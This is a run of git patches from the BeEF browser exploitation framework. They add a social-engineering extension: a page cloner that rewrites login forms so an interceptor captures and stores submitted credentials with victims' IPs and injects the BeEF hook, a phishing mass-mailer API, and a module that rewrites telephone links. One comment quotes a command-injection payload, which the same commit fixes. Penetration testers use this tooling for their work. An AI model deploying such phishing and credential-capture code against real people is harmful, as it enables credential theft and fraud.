@@ -39,4 +39,4 @@ beef:
                        images_cids:
                           cid1: "beef_logo.png"
                          #cid2: "second_image.png"
-                       attachment: [""]
+                       attachments: ["beef_attachment.pdf"]

From a6a9af848305588becc4d9207e4555d268046f78 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Fri, 31 Aug 2012 14:07:33 +0100
Subject: [PATCH 015/397] Minor changes to main Server class (mounts need to be
 an instance variable)

---
 core/main/server.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/core/main/server.rb b/core/main/server.rb
index b8ba556fd..e45fbbf77 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -62,9 +62,9 @@ module BeEF
         raise Exception::TypeError, '"url" needs to be a string' if not url.string?
 
         if args == nil
-          mounts[url] = http_handler_class
+          @mounts[url] = http_handler_class
         else
-          mounts[url] = http_handler_class, *args
+          @mounts[url] = http_handler_class, *args
         end
         print_debug("Server: mounted handler '#{url}'")
       end

From 6b5302ef2109b360d9e5661feca42e7a7a29322b Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Fri, 31 Aug 2012 14:08:08 +0100
Subject: [PATCH 016/397] Social Eng. Extension: Added RESTful API calls for
 both mass_mailer and web_cloner

---
 extensions/social_engineering/extension.rb    |  22 +++-
 .../rest/socialengineering.rb                 | 120 ++++++++++++++++++
 2 files changed, 136 insertions(+), 6 deletions(-)
 create mode 100644 extensions/social_engineering/rest/socialengineering.rb

diff --git a/extensions/social_engineering/extension.rb b/extensions/social_engineering/extension.rb
index 33ca7ac31..9b14498af 100644
--- a/extensions/social_engineering/extension.rb
+++ b/extensions/social_engineering/extension.rb
@@ -15,18 +15,28 @@
 #
 module BeEF
 module Extension
-module SocialEngineering
-  extend BeEF::API::Extension
 
-  @short_name = 'social_engineering'
-  @full_name = 'Social Engineering'
-  @description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.'
-end
+  module RegisterSEngHandler
+    def self.mount_handler(server)
+      server.mount('/api/seng', BeEF::Extension::SocialEngineering::SEngRest.new)
+    end
+  end
+
+  module SocialEngineering
+    extend BeEF::API::Extension
+
+    @short_name = 'social_engineering'
+    @full_name = 'Social Engineering'
+    @description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.'
+
+    BeEF::API::Registrar.instance.register(BeEF::Extension::RegisterSEngHandler, BeEF::API::Server, 'mount_handler')
+  end
 end
 end
 
 require 'extensions/social_engineering/web_cloner/web_cloner'
 require 'extensions/social_engineering/web_cloner/interceptor'
 require 'extensions/social_engineering/mass_mailer/mass_mailer'
+require 'extensions/social_engineering/rest/socialengineering'
 
 
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
new file mode 100644
index 000000000..fe11469b8
--- /dev/null
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -0,0 +1,120 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Extension
+    module SocialEngineering
+      class SEngRest < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        #Example: curl -H "Content-Type: application/json; charset=UTF-8"
+        #-d '{"url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=
+        #https://mail.google.com/mail/&ss=1&scc=1&ltmpl=default&ltmplcache=2", "mount":"/url"}'
+        #-X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7
+        post '/clone_page' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+            uri = body["url"]
+            mount = body["mount"]
+
+            if uri != nil && mount != nil
+              if (uri =~ URI::regexp).nil? #invalid URI
+                "Invalid URI"
+                halt 401
+              end
+
+              if !mount[/^\//] # mount needs to start with /
+                print_error "Invalid mount (need to be a relative path, and start with / )"
+                halt 401
+              end
+
+              web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
+              web_cloner.clone_page(uri,mount)
+            end
+
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            error 400 # Bad Request
+          end
+        end
+
+        # Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body'
+        #-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7
+        # Example json_body:
+        #{
+        #    "template": "default",
+        #    "subject": "Hi from BeEF",
+        #    "fromname": "BeEF",
+        #    "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
+        #    "linktext": "http://beefproject.com",
+        #    "recipients": [{
+        #            "user1@gmail.com": "Michele",
+        #            "user2@antisnatchor.com": "Antisnatchor"
+        #}]
+        #}
+        post '/send_mails' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+
+            template = body["template"]
+            subject = body["subject"]
+            fromname = body["fromname"]
+            link = body["link"]
+            linktext = body["linktext"]
+
+            if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
+              print_error "All parameters are mandatory."
+              halt 401
+            end
+
+            if (link =~ URI::regexp).nil? || (linktext =~ URI::regexp).nil?#invalid URI
+              print_error "Invalid link or linktext"
+              halt 401
+            end
+
+            recipients = body["recipients"][0]
+
+            recipients.each do |email,name|
+              if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil?
+                print_error "Email [#{email}] or name [#{name}] are not valid/null."
+                halt 401
+              end
+            end
+
+          mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+          mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            error 400
+          end
+        end
+
+      end
+    end
+  end
+end
\ No newline at end of file

From 9b1cae67903407c118ce7f688962cb06e53c735d Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Fri, 31 Aug 2012 15:22:09 +0100
Subject: [PATCH 017/397] Added social_engineering extension to main BeEF
 config file.

---
 config.yaml | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/config.yaml b/config.yaml
index 46c5e98c0..2c5939e42 100644
--- a/config.yaml
+++ b/config.yaml
@@ -20,12 +20,12 @@ beef:
     debug: false
 
     restrictions:
-        # subnet of browser ip addresses that can hook to the framework 
+        # subnet of browser ip addresses that can hook to the framework
         permitted_hooking_subnet: "0.0.0.0/0"
-        # subnet of browser ip addresses that can connect to the UI 
+        # subnet of browser ip addresses that can connect to the UI
         # permitted_ui_subnet: "127.0.0.1/32"
         permitted_ui_subnet: "0.0.0.0/0"
-    
+
     http:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
@@ -69,7 +69,7 @@ beef:
 
         # db_file is only used for sqlite
         db_file: "beef.db"
-        
+
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
         db_name: "beef"
@@ -87,11 +87,13 @@ beef:
     # You may override default extension configuration parameters here
     extension:
         requester:
-            enable: true 
+            enable: true
         proxy:
-            enable: true 
+            enable: true
         metasploit:
             enable: false
+        social_engineering:
+            enable: false
         console:
             shell:
                 enable: false

From 8eb0e2d97326919f0dc2ff3b8f6f144ce91a02ef Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sat, 1 Sep 2012 15:15:30 +0100
Subject: [PATCH 018/397] Social Eng. Extension: Added DB structure and logic
 for web_cloner and interceptor.

---
 extensions/social_engineering/extension.rb    | 14 ++++++++
 .../social_engineering/models/interceptor.rb  | 35 ++++++++++++++++++
 .../social_engineering/models/web_cloner.rb   | 36 +++++++++++++++++++
 .../rest/socialengineering.rb                 |  2 +-
 .../web_cloner/interceptor.rb                 | 10 ++++--
 .../web_cloner/web_cloner.rb                  | 19 +++++++++-
 6 files changed, 111 insertions(+), 5 deletions(-)
 create mode 100644 extensions/social_engineering/models/interceptor.rb
 create mode 100644 extensions/social_engineering/models/web_cloner.rb

diff --git a/extensions/social_engineering/extension.rb b/extensions/social_engineering/extension.rb
index 9b14498af..20f04a756 100644
--- a/extensions/social_engineering/extension.rb
+++ b/extensions/social_engineering/extension.rb
@@ -34,9 +34,23 @@ module Extension
 end
 end
 
+# Handlers
 require 'extensions/social_engineering/web_cloner/web_cloner'
 require 'extensions/social_engineering/web_cloner/interceptor'
 require 'extensions/social_engineering/mass_mailer/mass_mailer'
+
+# Models
+require 'extensions/social_engineering/models/web_cloner'
+require 'extensions/social_engineering/models/interceptor'
+#require 'extensions/social_engineering/models/mass_mailer'
+
+# RESTful api endpoints
 require 'extensions/social_engineering/rest/socialengineering'
 
 
+
+
+
+
+
+
diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb
new file mode 100644
index 000000000..9a72cf64d
--- /dev/null
+++ b/extensions/social_engineering/models/interceptor.rb
@@ -0,0 +1,35 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class Interceptor
+
+        include DataMapper::Resource
+
+        storage_names[:default] = 'extension_seng_interceptor'
+
+        property :id, Serial
+
+        property :post_data, Text, :lazy => false
+
+        belongs_to :webcloner
+
+      end
+
+    end
+  end
+end
diff --git a/extensions/social_engineering/models/web_cloner.rb b/extensions/social_engineering/models/web_cloner.rb
new file mode 100644
index 000000000..2c4a0903c
--- /dev/null
+++ b/extensions/social_engineering/models/web_cloner.rb
@@ -0,0 +1,36 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class Webcloner
+
+        include DataMapper::Resource
+
+        storage_names[:default] = 'extension_seng_webcloner'
+
+        property :id, Serial
+
+        property :uri, Text, :lazy => false
+        property :mount, Text, :lazy => false
+
+        has n, :extension_seng_interceptor, 'Interceptor'
+
+      end
+
+    end
+  end
+end
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index fe11469b8..fcb1c408b 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -43,7 +43,7 @@ module BeEF
 
             if uri != nil && mount != nil
               if (uri =~ URI::regexp).nil? #invalid URI
-                "Invalid URI"
+                print_error "Invalid URI"
                 halt 401
               end
 
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index 3cf6551d3..d8d19dfaa 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -27,9 +27,7 @@ module BeEF
       get "/" do
         print_info "GET request"
         print_info "Referer: #{request.referer}"
-        file = File.open(settings.file_path,'r')
-        cloned_page = file.read
-        file.close
+        cloned_page = settings.cloned_page
         cloned_page
       end
 
@@ -41,6 +39,12 @@ module BeEF
         print_info "Intercepted data:"
         print_info data
 
+        interceptor_db = BeEF::Core::Models::Interceptor.new(
+            :webcloner_id => settings.db_entry.id,
+            :post_data => data
+        )
+        interceptor_db.save
+
         if settings.frameable
           print_info "Page can be framed :-) Loading original URL into iFrame..."
           "<html><head><script type=\"text/javascript\" src=\"#{settings.beef_hook}\"></script>\n</head></head><body><iframe src=\"#{settings.redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 13c799ded..1e3c68205 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -74,10 +74,11 @@ module BeEF
           frameable = is_frameable(url)
 
           interceptor = BeEF::Extension::SocialEngineering::Interceptor
-          interceptor.set :file_path, file_path
           interceptor.set :redirect_to, url
           interceptor.set :frameable, frameable
           interceptor.set :beef_hook, @beef_hook
+          interceptor.set :cloned_page, get_page_content(file_path)
+          interceptor.set :db_entry, persist_page(url,mount)
 
           @http_server.mount("#{mount}", interceptor.new)
           print_info "Mounting cloned page on URL [#{mount}]"
@@ -114,6 +115,22 @@ module BeEF
           result
         end
 
+        def get_page_content(file_path)
+          file = File.open(file_path,'r')
+          cloned_page = file.read
+          file.close
+          cloned_page
+        end
+
+        def persist_page(uri, mount)
+          webcloner_db = BeEF::Core::Models::Webcloner.new(
+              :uri => uri,
+              :mount => mount
+          )
+          webcloner_db.save
+          webcloner_db
+        end
+
       end
     end
   end

From ab588c0f6816e87f03ee79c5f33cd108b41691be Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 2 Sep 2012 16:58:43 +0930
Subject: [PATCH 019/397] Add link_rewrite_tel module

Fixes issue #721
---
 core/main/client/dom.js                       | 25 +++++++++++++++++
 .../hooked_domain/link_rewrite_tel/command.js | 24 ++++++++++++++++
 .../link_rewrite_tel/config.yaml              | 25 +++++++++++++++++
 .../hooked_domain/link_rewrite_tel/module.rb  | 28 +++++++++++++++++++
 4 files changed, 102 insertions(+)
 create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/command.js
 create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/config.yaml
 create mode 100644 modules/browser/hooked_domain/link_rewrite_tel/module.rb

diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 387b514bf..4cb0c2cba 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -194,6 +194,31 @@ beef.dom = {
 		return count;
 	},
 
+	/**
+	 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
+	 * @param: {String} new_number: the new link telephone number to be written
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteTelLinks: function(new_number, selector) {
+
+		var count = 0;
+		var re = new RegExp("tel:/?/?.*", "gi");
+		var sel = (selector == null) ? 'a' : selector;
+
+		$j(sel).each(function() {
+			if ($j(this).attr('href') != null) {
+				var url = $j(this).attr('href');
+				if (url.match(re)) {
+					$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
+					count++;
+				}
+			}
+		});
+
+		return count;
+	},
+
     /**
      *  Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
      * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/command.js b/modules/browser/hooked_domain/link_rewrite_tel/command.js
new file mode 100644
index 000000000..d51007a95
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_tel/command.js
@@ -0,0 +1,24 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var tel_number = "<%= @tel_number %>";
+	var selector   = "a";
+
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number);
+
+});
+
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
new file mode 100644
index 000000000..68618861e
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        link_rewrite_tel:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Replace HREFs (TEL)"
+            description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/module.rb b/modules/browser/hooked_domain/link_rewrite_tel/module.rb
new file mode 100644
index 000000000..929c62356
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_tel/module.rb
@@ -0,0 +1,28 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Link_rewrite_tel < BeEF::Core::Command
+
+  def self.options
+    return [
+      { 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' }
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end

From ae72f9fedf1223a199b4e63b67849bd190b6766f Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 2 Sep 2012 16:23:53 +0100
Subject: [PATCH 020/397] Social Eng. extension: added request.ip to
 interceptor logs, adapted output

---
 .../social_engineering/models/interceptor.rb  |   2 +-
 .../rest/socialengineering.rb                 |  12 ++-
 .../web_cloner/interceptor.rb                 |   7 +-
 .../web_cloner/web_cloner.rb                  | 100 ++++++++++--------
 4 files changed, 73 insertions(+), 48 deletions(-)

diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb
index 9a72cf64d..ab92cdadd 100644
--- a/extensions/social_engineering/models/interceptor.rb
+++ b/extensions/social_engineering/models/interceptor.rb
@@ -23,7 +23,7 @@ module BeEF
         storage_names[:default] = 'extension_seng_interceptor'
 
         property :id, Serial
-
+        property :ip, Text, :lazy => false
         property :post_data, Text, :lazy => false
 
         belongs_to :webcloner
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index fcb1c408b..cc3470333 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -53,7 +53,17 @@ module BeEF
               end
 
               web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
-              web_cloner.clone_page(uri,mount)
+              success = web_cloner.clone_page(uri,mount)
+              if success
+                result = {
+                    "success" => true,
+                    "mount" => mount
+                }.to_json
+              else
+                result = {
+                    "success" => false
+                }.to_json
+              end
             end
 
           rescue Exception => e
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index d8d19dfaa..17e4e57c1 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -25,7 +25,7 @@ module BeEF
 
       # intercept GET
       get "/" do
-        print_info "GET request"
+        print_info "GET request from IP #{request.ip}"
         print_info "Referer: #{request.referer}"
         cloned_page = settings.cloned_page
         cloned_page
@@ -33,7 +33,7 @@ module BeEF
 
       # intercept POST
       post "/" do
-        print_info "POST request"
+        print_info "POST request from IP #{request.ip}"
         request.body.rewind
         data = request.body.read
         print_info "Intercepted data:"
@@ -41,7 +41,8 @@ module BeEF
 
         interceptor_db = BeEF::Core::Models::Interceptor.new(
             :webcloner_id => settings.db_entry.id,
-            :post_data => data
+            :post_data => data,
+            :ip => request.ip
         )
         interceptor_db.save
 
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 1e3c68205..02637908d 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -34,55 +34,69 @@ module BeEF
           output_mod = "#{output}_mod"
           user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
 
-          #todo: prevent command injection using IO.popen passing an array of arguments
-          # see here: http://devblog.avdi.org/2012/03/29/generating-cows-with-io-popen/
-          wget = "wget '#{url}' --no-check-certificate -c -k -U '#{user_agent}' -O #{@cloned_pages_dir + output}"
-          IO.popen(wget.to_s) { |f| result = f.gets }
 
-          File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
-            File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
-              # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
-              if line.include?("<form ")
-                line_attrs = line.split(" ")
-                count = 0
-                #probably doable also with map!
-                line_attrs.each do |attr|
-                  if attr.include? "action=\""
-                    print_info "Form action found."
-                    break
+          wget = "wget '#{url}' --background --no-check-certificate -c -k -U '#{user_agent}' -O #{@cloned_pages_dir + output}"
+          IO.popen(wget.to_s) { |f|
+            @result = f.gets
+            print_debug "Wget: #{@result}"
+          }
+
+          success = false
+          if @result.nil?
+             print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
+          else
+            File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
+              File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
+                # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
+                if line.include?("<form ")
+                  line_attrs = line.split(" ")
+                  count = 0
+                  #todo: probably doable also with map!
+                  line_attrs.each do |attr|
+                    if attr.include? "action=\""
+                      print_info "Form action found: #{attr}"
+                      break
+                    end
+                    count += 1
                   end
-                  count += 1
+                  line_attrs[count] = "action=\"#{mount}\""
+                  mod_form = line_attrs.join(" ")
+                  print_info "Form action value changed in order to be intercepted :-D"
+                  out_file.print mod_form
+                  # Add the BeEF hook
+                elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
+                  out_file.print add_beef_hook(line)
+                  print_info "BeEF hook added :-D"
+                else
+                  out_file.print line
                 end
-                line_attrs[count] = "action=\"#{mount}\""
-                mod_form = line_attrs.join(" ")
-                print_info "Form action value changed to / in order to be intercepted."
-                out_file.print mod_form
-              # Add the BeEF hook
-              elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
-                out_file.print add_beef_hook(line)
-                print_info "Added BeEF hook."
-              else
-                out_file.print line
               end
             end
+
+            if File.size("#{@cloned_pages_dir + output}") > 0
+              print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
+
+              file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
+
+              # Check if the original URL can be framed
+              frameable = is_frameable(url)
+
+              interceptor = BeEF::Extension::SocialEngineering::Interceptor
+              interceptor.set :redirect_to, url
+              interceptor.set :frameable, frameable
+              interceptor.set :beef_hook, @beef_hook
+              interceptor.set :cloned_page, get_page_content(file_path)
+              interceptor.set :db_entry, persist_page(url,mount)
+
+              @http_server.mount("#{mount}", interceptor.new)
+              print_info "Mounting cloned page on URL [#{mount}]"
+              @http_server.remap
+              success = true
+            else
+              print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
+            end
           end
-          print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
-
-          file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
-
-          # Check if the original URL can be framed
-          frameable = is_frameable(url)
-
-          interceptor = BeEF::Extension::SocialEngineering::Interceptor
-          interceptor.set :redirect_to, url
-          interceptor.set :frameable, frameable
-          interceptor.set :beef_hook, @beef_hook
-          interceptor.set :cloned_page, get_page_content(file_path)
-          interceptor.set :db_entry, persist_page(url,mount)
-
-          @http_server.mount("#{mount}", interceptor.new)
-          print_info "Mounting cloned page on URL [#{mount}]"
-          @http_server.remap
+            success
         end
 
         private

From ed9b1d5c2ebb617a2b21fb9f885ffc2340c9c874 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 2 Sep 2012 17:25:50 +0100
Subject: [PATCH 021/397] Social Eng. Extension: webcloner ->calling IO.popen
 in a secure way

---
 .../web_cloner/web_cloner.rb                  | 42 +++++++++++++------
 1 file changed, 29 insertions(+), 13 deletions(-)

diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 02637908d..1cf5feb7f 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -34,32 +34,47 @@ module BeEF
           output_mod = "#{output}_mod"
           user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
 
-
-          wget = "wget '#{url}' --background --no-check-certificate -c -k -U '#{user_agent}' -O #{@cloned_pages_dir + output}"
-          IO.popen(wget.to_s) { |f|
-            @result = f.gets
-            print_debug "Wget: #{@result}"
-          }
-
           success = false
-          if @result.nil?
-             print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
-          else
+          # prevent command injection attacks, passing URLs like (http://antisnatchor'||touch /tmp/foo #). No shells are open in the following case.
+          begin
+            IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate","--background"], 'r+') do |wget_io| end
+            success = true
+          rescue Exception => e
+            print_error "Errors executing wget: #{e}"
+            print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
+          end
+
+          if success
             File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
               File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
                 # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
                 if line.include?("<form ")
                   line_attrs = line.split(" ")
-                  count = 0
+                  c = 0
+                  cc = 0
                   #todo: probably doable also with map!
+
+                  # modify the form 'action' attribute
                   line_attrs.each do |attr|
                     if attr.include? "action=\""
                       print_info "Form action found: #{attr}"
                       break
                     end
-                    count += 1
+                    c += 1
                   end
-                  line_attrs[count] = "action=\"#{mount}\""
+                  line_attrs[c] = "action=\"#{mount}\""
+
+                  #todo: to be tested, needed in case like yahoo
+                  # delete the form 'onsubmit' attribute
+                  #line_attrs.each do |attr|
+                  #  if attr.include? "onsubmit="
+                  #    print_info "Form onsubmit event found: #{attr}"
+                  #    break
+                  #  end
+                  #  cc += 1
+                  #end
+                  #line_attrs[cc] = ""
+
                   mod_form = line_attrs.join(" ")
                   print_info "Form action value changed in order to be intercepted :-D"
                   out_file.print mod_form
@@ -94,6 +109,7 @@ module BeEF
               success = true
             else
               print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
+              success = false
             end
           end
             success

From d881852216f6499af7b5c191cf47663a9a64951a Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 2 Sep 2012 17:26:38 +0100
Subject: [PATCH 022/397] Social Eng. extension: added notes about 'wget' and
 'file' commands required for the extension.

---
 extensions/social_engineering/config.yaml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index de77968e4..50213ce6b 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -20,9 +20,11 @@ beef:
             name: 'Social Engineering'
             authors: ["antisnatchor"]
             web_cloner:
+                # NOTE: you must have 'wget' in your PATH
                 add_beef_hook: true
